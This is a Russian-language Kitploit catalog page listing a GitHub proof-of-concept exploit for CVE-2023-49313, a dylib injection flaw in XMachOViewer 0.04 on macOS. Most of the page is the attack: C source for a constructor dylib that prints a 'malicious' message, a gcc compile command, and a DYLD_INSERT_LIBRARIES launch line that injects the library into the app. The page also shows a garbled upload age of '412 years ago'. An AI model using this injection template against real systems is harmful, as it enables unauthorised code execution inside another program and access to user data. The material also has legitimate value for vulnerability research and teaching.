Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-49313 — Эксплойт (proof-of-concept) для уязвимости внедрения dylib в XMachOViewer 0.04, демонстрирующий несанкционированное выполнение кода через DYLD_INSERT_LIBRARIES на macOS. | Kitploit
Инструменты/GitHubGitHub/louiselalanne/cve-2023-49313
ЭксплуатацияОбучение и ОбразованиеРазработка Полезной НагрузкиЭксплуатация Бинарных Файлов
GitHublouiselalanne/cve-2023-49313

CVE-2023-49313

Эксплойт (proof-of-concept) для уязвимости внедрения dylib в XMachOViewer 0.04, демонстрирующий несанкционированное выполнение кода через DYLD_INSERT_LIBRARIES на macOS.

Репозиторий
412 лет назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-49313

Уязвимость внедрения dylib в XMachOViewer 0.04 позволяет злоумышленникам нарушить целостность. Используя её, можно внедрить несанкционированный код в процессы продукта, что потенциально может привести к удалённому управлению и несанкционированному доступу к конфиденциальным данным пользователя.

Captura de Tela 2023-11-27 às 20 06 48

Переносная версия для macOS

  • Сначала напишем dylib
root@kitploit:~
#include <syslog.h>
#include <stdio.h>

__attribute__((constructor))
static void poc(void)
{
    printf("Malicious Dylib Inserted");
}
  • Скомпилируйте gcc -dynamiclib -arch x86_64 -o poc.dylib poc.c

  • И внедрите его: DYLD_INSERT_LIBRARIES=poc.dylib /Applications/XMachOViewer.app/Contents/MacOS/XMachOViewer

Это откроет приложение и запустит dylib. После закрытия приложения мы видим это в терминале:

Captura de Tela 2023-11-27 às 19 52 57

  • Вы можете изучить и понять больше по этой теме на: https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation/macos-proces-abuse/macos-library-injection/macos-dyld-hijacking-and-dyld_insert_libraries
Скачать инструмент